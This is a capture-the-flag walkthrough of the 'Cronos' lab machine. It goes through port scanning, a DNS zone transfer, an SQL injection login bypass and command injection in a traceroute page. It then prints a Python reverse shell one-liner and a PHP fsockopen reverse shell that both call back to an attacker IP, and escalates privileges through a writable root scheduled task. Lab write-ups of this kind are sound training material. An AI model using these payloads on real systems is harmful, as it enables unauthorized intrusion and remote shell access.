Cronos

Overview

Initial Foothold : SQL Injection along with Command injection

Privilege Escalation : Schedule Tasks

Enumeration

Starting with port scanning

Port Scanning

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Cronos
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.2 - 4.9 (92%), Linux 3.12 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Interesting Port 53 was open which tells that dns server is running

Lets start with dns enumeration

DNS Enumeration

First of all add the hostname of the machine which is cronos.htb in /etc/hosts file

Now lets perform zone transfer

With the help of zone transfer we can obtain potential subdomains of the site running

If you want to learn why and what is zone transfer refer to

What are DNS zone transfers (AXFR)?Acunetix

Zone transfer using dig command

dig axfr cronos.htb @10.10.10.13

Got some subdomains fo the hostname cronos.htb

lets add them in our /etc/hosts file

That's all for dns enumeration we got the information we needed

Web Enumeration

Lets visit the webpage

Simple Webpage was running

Used directory bruteforce but got nothing

but from our previous dns enumeration we had got some subdomain

Lets use them

at admin.cronos we got login page

We dont have creds lets try sql injection on this login page

and we successfully logged in using

Username : admin'or'1'='1; #

password : password

The above sql injection got us logged in as admin user

Exploitation

After logging we got webpage which do traceroute

There may be possibilty of command injection in this because this was executing on server side

lets do command injection

Using query 8.8.8.8;ls we got the above result

hence it is confirmed that there is command injection vulnerabilty in the above webpage

Lets use this to get reverse shell

Now use reverse shell from pentestmonkey site

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheetpentestmonkey.net

Try python reverse shell command

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Enter the above command in the textbox of the webpage and setup listener on port 1234

And got the reverse shell

Grab the user.txt file

Privilege Escalation

After some enumeration got that there was schedule task running with root permission which the user can overwrite

Lets overwrite the file

with our reverse shellcode and setup listener

<?php
$sock=fsockopen("10.10.14.40",4444);exec("/bin/sh -i <&3 >&3 2>&3");

After some time the task was executed and we got the root shell on port 4444

That's all for this box

Good Bye :)